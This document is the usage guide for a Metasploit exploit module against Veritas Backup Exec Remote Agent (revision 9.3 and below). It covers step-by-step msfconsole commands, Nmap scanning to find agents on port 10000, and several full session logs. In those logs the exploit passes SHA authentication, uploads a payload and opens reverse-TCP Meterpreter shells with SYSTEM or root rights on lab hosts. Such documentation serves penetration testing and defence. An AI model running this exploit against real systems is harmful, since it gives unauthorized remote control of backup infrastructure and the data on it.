## Vulnerable Application

Backup Exec consists of a server component as well as remote agents that are
installed on each host that should be backed up by the server.

There are remote agents available for a range of data sources, including
operating-system level agents for Windows and Linux hosts' local filesystems,
application-specific agents for Microsoft Exchange, SharePoint, Active
Directory, etc., and agents for virtual machines such as VMware or Hyper-V
instances. This exploit targets the Windows and Linux OS-level remote agents.
The agents are installed as services running by default with
`NT AUTHORITY\SYSTEM` or `root` user rights for Windows and Linux respectively.

Vulnerable Backup Exec Remote Agent versions are 9.3 and below. These
agents' versions are distributed with Backup Exec versions 21.1 and below.

A trial version of Backup Exec can be downloaded from Veritas'
[website](https://www.veritas.com/form/trialware/backup-exec).
All supported version of Backup Exec is available in Veritas'
[download center](https://www.veritas.com/content/support/en_US/downloads/).

## Verification Steps

1. Download Backup Exec distributive and install Backup Exec Remote
   Agent on Windows or Linux host.
2. Start `msfconsole`.
3. Select the module and set the address of the host running the remote agent:
```
   use exploit/multi/veritas/beagent_sha_auth_rce
   set RHOSTS [REMOTE_AGENT_HOST]
```
4. Check the service is running and potentially vulnerable with the `check`
   command.
5. Set TARGET (Windows or Linux) depending on operating system on the host
   running the remote agent:
```
   set TARGET [OS_NAME]
```
6. Set and configure preferred payload:
```
   set PAYLOAD [PAYLOAD_NAME]
   set LHOST [LOCAL_IP]
   set LPORT [LOCAL_PORT]
```
7. If Backup Exec Remote Agent run on the Linux then set preferred interpreter
   to execute the command (by default, `/bin/bash`). The option does not matter
   for Windows hosts since the command will always be executed using
   `C:\Windows\System32\cmd.exe`.
```
   set INTERPRETER [INTERPRETER_NAME]
```
8. Start the module using the `exploit` command.
9. Enjoy the received shell.

An example session is as follows:

```
msf6 > use exploit/multi/veritas/beagent_sha_auth_rce
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 172.16.180.141
rhosts => 172.16.180.141
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 172.16.180.248
lhost => 172.16.180.248
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > show options

Module options (exploit/multi/veritas/beagent_sha_auth_rce):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  172.16.180.141   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT   10000            yes       The target port (TCP)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.180.248   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf6 exploit(multi/veritas/beagent_sha_auth_rce) > check

[*] 172.16.180.141:10000 - Checking vulnerability
[*] 172.16.180.141:10000 - Connecting to BE Agent service
[*] 172.16.180.141:10000 - Getting supported authentication types
[*] 172.16.180.141:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5), SSPI (4)
[*] 172.16.180.141:10000 - BE agent revision: 9.3
[*] 172.16.180.141:10000 - The target appears to be vulnerable. SHA authentication is enabled
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run

[*] Started reverse TCP handler on 172.16.180.248:4444
[*] 172.16.180.141:10000 - Running automatic check ("set AutoCheck false" to disable)
[*] 172.16.180.141:10000 - Checking vulnerability
[*] 172.16.180.141:10000 - Connecting to BE Agent service
[*] 172.16.180.141:10000 - Getting supported authentication types
[*] 172.16.180.141:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5), SSPI (4)
[*] 172.16.180.141:10000 - BE agent revision: 9.3
[+] 172.16.180.141:10000 - The target appears to be vulnerable. SHA authentication is enabled
[*] 172.16.180.141:10000 - Exploiting ...
[*] 172.16.180.141:10000 - Connecting to BE Agent service
[*] 172.16.180.141:10000 - Enabling TLS for NDMP connection
[*] 172.16.180.141:10000 - Passing SHA authentication
[*] 172.16.180.141:10000 - Uploading payload with NDMP_FILE_WRITE packet
[*] Sending stage (175686 bytes) to 172.16.180.141
[*] Meterpreter session 1 opened (172.16.180.248:4444 -> 172.16.180.141:49629) at 2022-09-23 10:33:42 +0300

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : TEST-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
```

## Options

### INTERPRETER
The command line interpreter for executing Linux OS command. By default, the option is
`/bin/bash`. For Windows the option does not matter and the command will always be
executed using `C:\Windows\System32\cmd.exe`.

## Scenarios

The Backup Exec Remote Agent is installed on each host that has local filesystems
that should be backed up. These agents listen on the network for NDMP connections
(10000/tcp), appearing in Nmap scans with scripts enabled as follows:

```
$ nmap -p10000 -n 172.16.180.0/24 --open -vvv
...
Discovered open port 10000/tcp on 172.16.180.133
Discovered open port 10000/tcp on 172.16.180.132
Discovered open port 10000/tcp on 172.16.180.141
...
$ nmap -p10000 -n -sV 172.16.180.133
...
10000/tcp open  ndmp    Symantec/Veritas Backup Exec ndmp (NDMPv3)
...
```

(Note that the `ndmp-version` script fails to execute due to not sending an
`NDMP_CONNECT_OPEN` request before querying version information with the
`NDMP_CONFIG_GET_HOST_INFO` request. This exploit module's `check` command will
carry this query out successfully.)

### Windows; Backup Exec 21.0 (Backup Exec Remote Agent, revision 9.3)
```
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 192.168.123.147
rhosts => 192.168.123.147
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] 192.168.123.147:10000 - Running automatic check ("set AutoCheck false" to disable)
[*] 192.168.123.147:10000 - Checking vulnerability
[*] 192.168.123.147:10000 - Connecting to BE Agent service
[*] 192.168.123.147:10000 - Getting supported authentication types
[*] 192.168.123.147:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5), SSPI (4)
[*] 192.168.123.147:10000 - BE agent revision: 9.3
[+] 192.168.123.147:10000 - The target appears to be vulnerable. SHA authentication is enabled
[*] 192.168.123.147:10000 - Exploiting ...
[*] 192.168.123.147:10000 - Connecting to BE Agent service
[*] 192.168.123.147:10000 - Enabling TLS for NDMP connection
[*] 192.168.123.147:10000 - Passing SHA authentication
[*] 192.168.123.147:10000 - Uploading payload with NDMP_FILE_WRITE packet
[*] Sending stage (175686 bytes) to 192.168.123.147
[*] Meterpreter session 5 opened (192.168.123.1:4444 -> 192.168.123.147:49835) at 2022-09-22 15:23:19 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-BE1QFC9
OS              : Windows 10 (10.0 Build 19041).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.123.147 - Meterpreter session 1 closed.  Reason: User exit
```

### Linux; Backup Exec 16.0 (Backup Exec Remote Agent, revision 9.2)
```
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 172.16.199.133
rhosts => 172.16.199.133
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set target 1
target => 1
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] 172.16.199.133:10000 - Running automatic check ("set AutoCheck false" to disable)
[*] 172.16.199.133:10000 - Checking vulnerability
[*] 172.16.199.133:10000 - Connecting to BE Agent service
[*] 172.16.199.133:10000 - Getting supported authentication types
[*] 172.16.199.133:10000 - Supported authentication by BE agent: BEWS2 (190), SHA (5)
[*] 172.16.199.133:10000 - BE agent revision: 9.2
[+] 172.16.199.133:10000 - The target appears to be vulnerable. SHA authentication is enabled
[*] 172.16.199.133:10000 - Exploiting ...
[*] 172.16.199.133:10000 - Connecting to BE Agent service
[*] 172.16.199.133:10000 - Enabling TLS for NDMP connection
[*] 172.16.199.133:10000 - Passing SHA authentication
[*] 172.16.199.133:10000 - Uploading payload with CmdStager
[*] 172.16.199.133:10000 - Command Stager progress -  44.15% done (362/820 bytes)
[*] Sending stage (3020772 bytes) to 172.16.199.133
[*] 172.16.199.133:10000 - Command Stager progress - 100.00% done (820/820 bytes)
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.133:55062) at 2022-09-22 15:17:01 -0400

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : debian.test.com
OS           : Debian 9.13 (Linux 4.9.0-19-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > Interrupt: use the 'exit' command to quit
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.199.133 - Meterpreter session 2 closed.  Reason: User exit
```

### Windows; Backup Exec 21.2 (Backup Exec Remote Agent, revision 9.4) - NOT VULNERABLE
```
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > use exploit/multi/veritas/beagent_sha_auth_rce
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set rhosts 172.16.180.135
rhosts => 172.16.180.135
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > set lhost 172.16.180.248
lhost => 172.16.180.248
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > check

[*] 172.16.180.135:10000 - Checking vulnerability
[*] 172.16.180.135:10000 - Connecting to BE Agent service
[*] 172.16.180.135:10000 - Getting supported authentication types
[*] 172.16.180.135:10000 - Supported authentication by BE agent: BEWS2 (190), SSPI (4)
[*] 172.16.180.135:10000 - BE agent revision: 9.4
[*] 172.16.180.135:10000 - The target is not exploitable. SHA authentication is disabled
msf6 exploit(multi/veritas/beagent_sha_auth_rce) > run

[*] Started reverse TCP handler on 172.16.180.248:4444
[*] 172.16.180.135:10000 - Running automatic check ("set AutoCheck false" to disable)
[*] 172.16.180.135:10000 - Checking vulnerability
[*] 172.16.180.135:10000 - Connecting to BE Agent service
[*] 172.16.180.135:10000 - Getting supported authentication types
[*] 172.16.180.135:10000 - Supported authentication by BE agent: BEWS2 (190), SSPI (4)
[*] 172.16.180.135:10000 - BE agent revision: 9.4
[-] 172.16.180.135:10000 - Exploit aborted due to failure: not-vulnerable: The target is not exploitable. SHA authentication is disabled "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/veritas/beagent_sha_auth_rce) >
```
